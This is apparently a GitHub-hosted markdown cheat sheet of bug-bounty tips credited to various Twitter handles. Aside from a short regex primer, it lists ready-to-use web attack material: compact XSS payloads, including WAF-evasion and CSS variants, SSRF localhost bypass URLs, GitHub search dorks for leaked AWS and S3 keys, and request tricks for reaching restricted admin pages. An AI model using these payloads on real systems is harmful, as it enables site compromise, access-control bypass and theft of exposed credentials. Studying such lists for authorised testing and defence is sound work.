Skip to content

Latest commit

 

History

History
85 lines (74 loc) · 1.7 KB

tips.md

File metadata and controls

85 lines (74 loc) · 1.7 KB

Learn Regex in 4 tweets / from @s0md3v

cat matches cat
ca+t matches caaaaaaaaaaaat but not ct
ca*t matches caaaaaaaaaaaat and also ct
ca{2,4} matches caat, caaat and caaaat
c(at)+ matches catatatatatat
c(at|orn) matches cat and corn
c[ea] matches cat and cet
c[ea]+ matches caaaat and ceeet

Tiny XSS payloads / from @terjanq

<x/oncut=alert(1)>a
<svg/onload=eval(name)>
<iframe/onload=write(URL)>
<svg/onload=eval(`'`+URL)>
<svg/onload=location=name>
<iframe/onload=src=top.name>
<iframe/onload=eval('`'+URL)>
<style/onload=eval(name)>
<style/onload=write(URL)>
<style/onload=eval(`'`+URL)>
<style/onerror=eval(name)>

SSRF Bypass list for localhost (127.0.0.1) / from @LooseSecurity

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
http://localhost.me
http://localhost.nip.io

Github dorks / from @hunter0x7

org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"

Bypass admin page / from @hunter0x7

GET /admin HTTP/1.1
Host: http://site.com
...
Access is denied

GET /test HTTP/1.1
Host: http://site.com
X-Original-URL: /admin

HTTP/1.1 200 OK

Bypass /admin / from @secoceans

/admin -> not allowed
/%61dmin -> allowed

CSS XSS payload / from @hunter0x7

img{background-image:url('javascript:alert()')}

Bypass WAF (Firefox) / from @lutfumertceylan

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=prompt;throw 1;">